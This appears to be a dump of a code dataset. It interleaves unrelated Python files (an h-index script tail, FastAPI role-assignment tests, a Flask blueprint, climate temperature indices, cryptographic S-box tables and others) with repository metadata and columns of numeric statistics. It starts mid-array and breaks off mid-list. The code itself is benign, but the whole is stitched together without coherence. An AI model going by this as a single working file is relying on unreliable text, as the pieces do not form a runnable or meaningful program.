6,96,96,96,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97
,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,97,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100]
# Ad-hoc smoke checks; each assignment overwrites the previous test input.
cits = [0]
cits = [1,2]
cits = [0,1,1,2]
# Parenthesized call form works under both Python 2 (parenthesized expression)
# and Python 3 (print function), unlike the bare print statement.
print(Solution().hIndex(cits))
| 1,022.586207
| 29,130
| 0.654527
| 10,094
| 29,655
| 1.922925
| 0.012582
| 0.025554
| 0.038022
| 0.050283
| 0.985162
| 0.985162
| 0.985162
| 0.985162
| 0.985162
| 0.985162
| 0
| 0.648562
| 0.004788
| 29,655
| 28
| 29,131
| 1,059.107143
| 0.009115
| 0.001888
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.052632
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
7421084799af7776dd51f8d48d87f131b42144ae
| 31
|
py
|
Python
|
__init__.py
|
oursky/forgot_password
|
9afde8b9d39a2837676628f12c9b6f2c45da592a
|
[
"Apache-2.0"
] | 1
|
2017-02-09T10:17:50.000Z
|
2017-02-09T10:17:50.000Z
|
__init__.py
|
oursky/forgot_password
|
9afde8b9d39a2837676628f12c9b6f2c45da592a
|
[
"Apache-2.0"
] | 54
|
2016-09-07T11:01:32.000Z
|
2020-02-12T06:15:43.000Z
|
__init__.py
|
oursky/forgot_password
|
9afde8b9d39a2837676628f12c9b6f2c45da592a
|
[
"Apache-2.0"
] | 14
|
2016-09-20T05:36:49.000Z
|
2019-04-02T15:42:37.000Z
|
from .forgot_password import *
| 15.5
| 30
| 0.806452
| 4
| 31
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 31
| 1
| 31
| 31
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
747c20c5bce0bc557449aa2375e4bb15c178cdc8
| 3,849
|
py
|
Python
|
tests/api/api_v1/test_user_roles.py
|
tsatsujnr139/fastapi-role-based-access-control-auth-service
|
6c6addb04edad80e167424e39574697008eb0e64
|
[
"MIT"
] | 47
|
2021-03-06T14:49:43.000Z
|
2022-03-05T12:18:59.000Z
|
tests/api/api_v1/test_user_roles.py
|
tsatsujnr139/fastapi-role-based-access-control-auth-service
|
6c6addb04edad80e167424e39574697008eb0e64
|
[
"MIT"
] | 5
|
2021-09-19T15:16:49.000Z
|
2022-01-26T15:47:48.000Z
|
tests/api/api_v1/test_user_roles.py
|
tsatsujnr139/fastapi-role-based-access-control-auth-service
|
6c6addb04edad80e167424e39574697008eb0e64
|
[
"MIT"
] | 15
|
2021-03-08T07:54:32.000Z
|
2022-03-09T13:57:23.000Z
|
from app import crud
from app.constants.role import Role
from app.core.config import settings
from app.schemas.user import UserCreate
from app.schemas.user_role import UserRoleCreate
from fastapi.testclient import TestClient
from sqlalchemy.orm import Session
from tests.utils.utils import random_email, random_lower_string
def test_assign_user_role_by_superadmin(
client: TestClient, superadmin_token_headers: dict, db: Session
) -> None:
username = random_email()
password = random_lower_string()
full_name = random_lower_string()
user_in = UserCreate(
email=username, password=password, full_name=full_name
)
user = crud.user.create(db, obj_in=user_in)
role = crud.role.get_by_name(db, name=Role.ACCOUNT_MANAGER["name"])
data = {"user_id": str(user.id), "role_id": str(role.id)}
r = client.post(
f"{settings.API_V1_STR}/user-roles",
headers=superadmin_token_headers,
json=data,
)
assert 200 <= r.status_code < 300
created_user_role = r.json()
user_role = crud.user_role.get_by_user_id(db, user_id=user.id)
assert user_role
assert str(user_role.role_id) == created_user_role["role_id"]
def test_assign_user_role_by_normal_user(
client: TestClient, superadmin_token_headers: dict, db: Session
) -> None:
username = random_email()
password = random_lower_string()
full_name = random_lower_string()
user_in = UserCreate(
email=username, password=password, full_name=full_name
)
user = crud.user.create(db, obj_in=user_in)
role = crud.role.get_by_name(db, name=Role.ACCOUNT_MANAGER["name"])
data = {"user_id": str(user.id), "role_id": str(role.id)}
r = client.post(
f"{settings.API_V1_STR}/user-roles",
headers=superadmin_token_headers,
json=data,
)
assert 200 <= r.status_code < 300
created_user_role = r.json()
user_role = crud.user_role.get_by_user_id(db, user_id=user.id)
assert user_role
assert str(user_role.role_id) == created_user_role["role_id"]
def test_update_user_role(
client: TestClient, superadmin_token_headers: dict, db: Session
) -> None:
username = random_email()
password = random_lower_string()
full_name = random_lower_string()
user_in = UserCreate(
email=username, password=password, full_name=full_name
)
user = crud.user.create(db, obj_in=user_in)
role = crud.role.get_by_name(db, name=Role.ACCOUNT_MANAGER["name"])
user_role_in = UserRoleCreate(user_id=user.id, role_id=role.id)
crud.user_role.create(db, obj_in=user_role_in)
new_role = crud.role.get_by_name(db, name=Role.ACCOUNT_ADMIN["name"])
data = {"role_id": str(new_role.id)}
r = client.put(
f"{settings.API_V1_STR}/user-roles/{user.id}",
headers=superadmin_token_headers,
json=data,
)
updated_user_role = r.json()
assert 200 <= r.status_code < 300
assert updated_user_role["role_id"] == str(new_role.id)
def test_update_user_role_by_unauthorized_user_fails(
client: TestClient, normal_user_token_headers: dict, db: Session
) -> None:
username = random_email()
password = random_lower_string()
full_name = random_lower_string()
user_in = UserCreate(
email=username, password=password, full_name=full_name
)
user = crud.user.create(db, obj_in=user_in)
role = crud.role.get_by_name(db, name=Role.ACCOUNT_MANAGER["name"])
user_role_in = UserRoleCreate(user_id=user.id, role_id=role.id)
crud.user_role.create(db, obj_in=user_role_in)
new_role = crud.role.get_by_name(db, name=Role.ACCOUNT_ADMIN["name"])
data = {"role_id": str(new_role.id)}
r = client.put(
f"{settings.API_V1_STR}/user-roles/{user.id}",
headers=normal_user_token_headers,
json=data,
)
assert r.status_code == 401
| 36.657143
| 73
| 0.706677
| 570
| 3,849
| 4.461404
| 0.122807
| 0.078647
| 0.060165
| 0.030672
| 0.83956
| 0.829335
| 0.788439
| 0.772316
| 0.772316
| 0.772316
| 0
| 0.007909
| 0.178748
| 3,849
| 104
| 74
| 37.009615
| 0.796583
| 0
| 0
| 0.739583
| 0
| 0
| 0.061055
| 0.038452
| 0
| 0
| 0
| 0
| 0.09375
| 1
| 0.041667
| false
| 0.083333
| 0.083333
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
748cab60059c9ef8d41b20df40b1703a9ee9ccde
| 760
|
py
|
Python
|
psynlp/helpers/builtins.py
|
Demfier/PsyNLP
|
e16952ce1bbbe9724071a009743654d11ae386d5
|
[
"MIT"
] | 5
|
2019-11-23T05:33:01.000Z
|
2021-12-30T22:37:43.000Z
|
psynlp/helpers/builtins.py
|
Demfier/PsyNLP
|
e16952ce1bbbe9724071a009743654d11ae386d5
|
[
"MIT"
] | 5
|
2018-04-10T10:31:22.000Z
|
2018-04-14T06:31:03.000Z
|
psynlp/helpers/builtins.py
|
Demfier/PsyNLP
|
e16952ce1bbbe9724071a009743654d11ae386d5
|
[
"MIT"
] | 1
|
2021-08-14T17:46:42.000Z
|
2021-08-14T17:46:42.000Z
|
import builtins as __builtin__
def init_verbose(verbose=False):
if not verbose:
__builtin__.verbose_print_1 = lambda *a, **k: None
__builtin__.verbose_print_2 = lambda *a, **k: None
__builtin__.verbose_print_3 = lambda *a, **k: None
elif verbose == 1:
__builtin__.verbose_print_1 = print
__builtin__.verbose_print_2 = lambda *a, **k: None
__builtin__.verbose_print_3 = lambda *a, **k: None
elif verbose == 2:
__builtin__.verbose_print_1 = print
__builtin__.verbose_print_2 = print
__builtin__.verbose_print_3 = lambda *a, **k: None
else:
__builtin__.verbose_print_1 = print
__builtin__.verbose_print_2 = print
__builtin__.verbose_print_3 = print
| 36.190476
| 58
| 0.668421
| 97
| 760
| 4.443299
| 0.206186
| 0.389791
| 0.529002
| 0.167053
| 0.786543
| 0.786543
| 0.786543
| 0.758701
| 0.730858
| 0.672854
| 0
| 0.02439
| 0.244737
| 760
| 20
| 59
| 38
| 0.726481
| 0
| 0
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.111111
| 0.666667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
77774ed700d7b2fcedafb2264a485bfb746a552c
| 91
|
py
|
Python
|
polls/views.py
|
r00m/flask-blueprint-quickstart
|
7c9dbeae20e4882eb887e1c88854c5f83e890f52
|
[
"MIT"
] | null | null | null |
polls/views.py
|
r00m/flask-blueprint-quickstart
|
7c9dbeae20e4882eb887e1c88854c5f83e890f52
|
[
"MIT"
] | null | null | null |
polls/views.py
|
r00m/flask-blueprint-quickstart
|
7c9dbeae20e4882eb887e1c88854c5f83e890f52
|
[
"MIT"
] | null | null | null |
from polls import blueprint
@blueprint.route('/')
def index():
return "Hello World!"
| 13
| 27
| 0.681319
| 11
| 91
| 5.636364
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175824
| 91
| 6
| 28
| 15.166667
| 0.826667
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 1
|
0
| 7
|
777cd98be4af74d61907b5f29ca27ee92b1266f4
| 221
|
py
|
Python
|
africanus/rime/cuda/__init__.py
|
JoshVStaden/codex-africanus
|
4a38994431d51510b1749fa0e4b8b6190b8b530f
|
[
"BSD-3-Clause"
] | 13
|
2018-04-06T09:36:13.000Z
|
2021-04-13T13:11:00.000Z
|
africanus/rime/cuda/__init__.py
|
JoshVStaden/codex-africanus
|
4a38994431d51510b1749fa0e4b8b6190b8b530f
|
[
"BSD-3-Clause"
] | 153
|
2018-03-28T14:13:48.000Z
|
2022-02-03T07:49:17.000Z
|
africanus/rime/cuda/__init__.py
|
JoshVStaden/codex-africanus
|
4a38994431d51510b1749fa0e4b8b6190b8b530f
|
[
"BSD-3-Clause"
] | 14
|
2018-03-29T13:30:52.000Z
|
2021-06-12T02:56:55.000Z
|
# flake8: noqa
from africanus.rime.cuda.beam import beam_cube_dde
from africanus.rime.cuda.feeds import feed_rotation
from africanus.rime.cuda.phase import phase_delay
from africanus.rime.cuda.predict import predict_vis
| 31.571429
| 51
| 0.846154
| 35
| 221
| 5.2
| 0.485714
| 0.285714
| 0.373626
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004975
| 0.090498
| 221
| 6
| 52
| 36.833333
| 0.900498
| 0.054299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
777d1729b6a670fc439712aae7df957bda909ea3
| 3,773
|
py
|
Python
|
climdex/temperature.py
|
weilin2018/pyclimdex
|
ccaf1ad3eda2d52b586dd4a3755be5eb9ba9a15b
|
[
"MIT"
] | 6
|
2021-01-11T14:52:23.000Z
|
2022-03-05T12:53:54.000Z
|
climdex/temperature.py
|
dawran/pyclimdex
|
c526e876016f61ee2fc1a659e68b6ef0f2e9cb24
|
[
"MIT"
] | null | null | null |
climdex/temperature.py
|
dawran/pyclimdex
|
c526e876016f61ee2fc1a659e68b6ef0f2e9cb24
|
[
"MIT"
] | 2
|
2020-03-14T00:44:45.000Z
|
2020-04-09T09:03:32.000Z
|
import xarray as xr
import numpy as np
import climdex.utils as utils
from typing import Union
def indices(time_dim='time', convert_units_fn=lambda x: x):
return TemperatureIndices(time_dim=time_dim, convert_units_fn=convert_units_fn)
class TemperatureIndices:
def __init__(self, time_dim='time', convert_units_fn=lambda x: x):
self.time_dim = time_dim
self.convert_units_fn = convert_units_fn
def annual_frost_days(self, X: Union[xr.DataArray, xr.Dataset], varname='MINT'):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.min(), time_dim=self.time_dim)
return (X_arr < self.convert_units_fn(0.0)).astype(X_arr.dtype).groupby(f'{self.time_dim}.year').sum()
def annual_tropical_nights(self, X: Union[xr.DataArray, xr.Dataset], varname='MINT'):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.min(), time_dim=self.time_dim)
return (X_arr > self.convert_units_fn(20.0)).astype(X_arr.dtype).groupby(f'{self.time_dim}.year').sum()
def annual_icing_days(self, X: Union[xr.DataArray, xr.Dataset], varname='MAXT'):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.max(), time_dim=self.time_dim)
return (X_arr < self.convert_units_fn(0.0)).astype(X_arr.dtype).groupby(f'{self.time_dim}.year').sum()
def annual_summer_days(self, X: Union[xr.DataArray, xr.Dataset], varname='MAXT'):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.max(), time_dim=self.time_dim)
return (X_arr > self.convert_units_fn(25.0)).astype(X_arr.dtype).groupby(f'{self.time_dim}.year').sum()
def annual_growing_season_length(self, X: Union[xr.DataArray, xr.Dataset], varname='MEANT'):
raise NotImplementedError()
def monthly_txx(self, X: Union[xr.DataArray, xr.Dataset], varname=None):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.max(), time_dim=self.time_dim)
return X.resample({self.time_dim: '1M'}).max()
def monthly_txn(self, X: Union[xr.DataArray, xr.Dataset], varname=None):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.max(), time_dim=self.time_dim)
return X.resample({self.time_dim: '1M'}).min()
def monthly_tnx(self, X: Union[xr.DataArray, xr.Dataset], varname=None):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.min(), time_dim=self.time_dim)
return X.resample({self.time_dim: '1M'}).max()
def monthly_tnn(self, X: Union[xr.DataArray, xr.Dataset], varname=None):
X_arr = utils.data_array_or_dataset_var(X, var=varname)
X_arr = utils.resample_daily(X_arr, lambda x: x.min(), time_dim=self.time_dim)
return X.resample({self.time_dim: '1M'}).min()
def daily_temperature_range(self,
X1: Union[xr.DataArray, xr.Dataset],
X2: Union[xr.DataArray, xr.Dataset]=None,
min_varname='MINT',
max_varname='MAXT'):
X1_arr = utils.data_array_or_dataset_var(X1, var=min_varname)
X2_arr = utils.data_array_or_dataset_var(X2, var=max_varname)
X_min_arr = utils.resample_daily(X1_arr, lambda x: x.min(), time_dim=self.time_dim)
X_max_arr = utils.resample_daily(X2_arr, lambda x: x.max(), time_dim=self.time_dim)
return X_max_arr - X_min_arr
| 56.313433
| 111
| 0.675855
| 599
| 3,773
| 3.96828
| 0.1202
| 0.100126
| 0.092554
| 0.083298
| 0.805217
| 0.784182
| 0.760623
| 0.736222
| 0.720656
| 0.691207
| 0
| 0.00722
| 0.19242
| 3,773
| 67
| 112
| 56.313433
| 0.772891
| 0
| 0
| 0.407407
| 0
| 0
| 0.033121
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.074074
| 0.018519
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
77906d2463d7c579d380ef329f49798605124508
| 11,091
|
py
|
Python
|
packages/divprop/tests/test_sboxes.py
|
CryptoExperts/AC21-divprop-convexity
|
ed4fb715c484b12413a5c59e4f189bcc37889449
|
[
"MIT"
] | 4
|
2021-11-13T03:31:00.000Z
|
2022-02-25T02:02:58.000Z
|
packages/divprop/tests/test_sboxes.py
|
CryptoExperts/AC21-divprop-convexity
|
ed4fb715c484b12413a5c59e4f189bcc37889449
|
[
"MIT"
] | null | null | null |
packages/divprop/tests/test_sboxes.py
|
CryptoExperts/AC21-divprop-convexity
|
ed4fb715c484b12413a5c59e4f189bcc37889449
|
[
"MIT"
] | null | null | null |
from random import shuffle, randrange
def get_sboxes():
ret = []
name = 'ASCON'
n = m = 5
sbox = [4, 11, 31, 20, 26, 21, 9, 2, 27, 5, 8, 18, 29, 3, 6, 28, 30, 19, 7, 14, 0, 13, 17, 24, 16, 12, 1, 25, 22, 10, 15, 23]
dppt = ([0], [1, 2, 4, 8, 16], [1, 2, 4, 8, 16], [3, 4, 9, 10, 17, 18, 24], [2, 4, 8, 16], [3, 5, 6, 9, 10, 12, 17, 18, 20, 24], [3, 5, 6, 8, 17, 18, 20], [6, 9, 10, 12, 19, 20, 24], [1, 2, 4, 8, 16], [1, 6, 10, 12, 16], [3, 5, 6, 8, 17, 18, 20], [3, 5, 6, 9, 10, 12, 18, 20, 24], [3, 5, 8, 16], [3, 5, 9, 10, 12, 17, 18, 20, 24], [7, 9, 10, 12, 17, 18, 20, 24], [7, 9, 12, 20, 24], [1, 2, 8, 16], [2, 5, 9, 12, 17, 20, 24], [2, 5, 9, 12, 17, 20, 24], [3, 5, 10, 12, 18, 20, 25], [3, 5, 6, 9, 10, 12, 18, 20, 24], [6, 10, 13, 18, 21, 25, 28], [6, 9, 10, 18, 21, 24], [10, 23, 25], [1, 6, 10, 12, 16], [3, 5, 6, 10, 18, 20, 25], [3, 5, 6, 9, 10, 18, 20, 24], [3, 5, 10, 18, 20, 25], [3, 5, 9, 10, 18, 20, 24], [10, 18, 29], [7, 9, 10, 18, 24], [31])
ret.append((name, sbox, n, m, dppt))
name = 'RECTANGLE'
n = m = 4
sbox = [6, 5, 12, 10, 1, 14, 7, 9, 11, 0, 3, 13, 8, 15, 4, 2]
dppt = ([0], [1, 2, 4, 8], [1, 2, 4, 8], [1, 4, 10], [1, 2, 4, 8], [3, 4, 8], [3, 4, 8], [3, 4, 9], [1, 2, 4, 8], [3, 5, 6, 8], [2, 5, 8], [6, 11, 13], [3, 4, 8], [6, 10, 13], [3, 5, 8], [15])
ret.append((name, sbox, n, m, dppt))
name = 'AES'
n = m = 8
sbox = [99, 124, 119, 123, 242, 107, 111, 197, 48, 1, 103, 43, 254, 215, 171, 118, 202, 130, 201, 125, 250, 89, 71, 240, 173, 212, 162, 175, 156, 164, 114, 192, 183, 253, 147, 38, 54, 63, 247, 204, 52, 165, 229, 241, 113, 216, 49, 21, 4, 199, 35, 195, 24, 150, 5, 154, 7, 18, 128, 226, 235, 39, 178, 117, 9, 131, 44, 26, 27, 110, 90, 160, 82, 59, 214, 179, 41, 227, 47, 132, 83, 209, 0, 237, 32, 252, 177, 91, 106, 203, 190, 57, 74, 76, 88, 207, 208, 239, 170, 251, 67, 77, 51, 133, 69, 249, 2, 127, 80, 60, 159, 168, 81, 163, 64, 143, 146, 157, 56, 245, 188, 182, 218, 33, 16, 255, 243, 210, 205, 12, 19, 236, 95, 151, 68, 23, 196, 167, 126, 61, 100, 93, 25, 115, 96, 129, 79, 220, 34, 42, 144, 136, 70, 238, 184, 20, 222, 94, 11, 219, 224, 50, 58, 10, 73, 6, 36, 92, 194, 211, 172, 98, 145, 149, 228, 121, 231, 200, 55, 109, 141, 213, 78, 169, 108, 86, 244, 234, 101, 122, 174, 8, 186, 120, 37, 46, 28, 166, 180, 198, 232, 221, 116, 31, 75, 189, 139, 138, 112, 62, 181, 102, 72, 3, 246, 14, 97, 53, 87, 185, 134, 193, 29, 158, 225, 248, 152, 17, 105, 217, 142, 148, 155, 30, 135, 233, 206, 85, 40, 223, 140, 161, 137, 13, 191, 230, 66, 104, 65, 153, 45, 15, 176, 84, 187, 22]
dppt = ([0], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [2, 4, 8, 16, 32, 64, 129], [3, 4, 8, 16, 32, 65, 66, 129, 130], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 
4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 32, 192], [1, 2, 4, 8, 16, 96, 192], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [2, 4, 8, 16, 32, 64, 129], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [2, 4, 8, 16, 64, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 128], [2, 4, 8, 16, 33, 65, 129, 224], [3, 8, 17, 18, 34, 48, 65, 68, 129, 132, 144, 224], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 
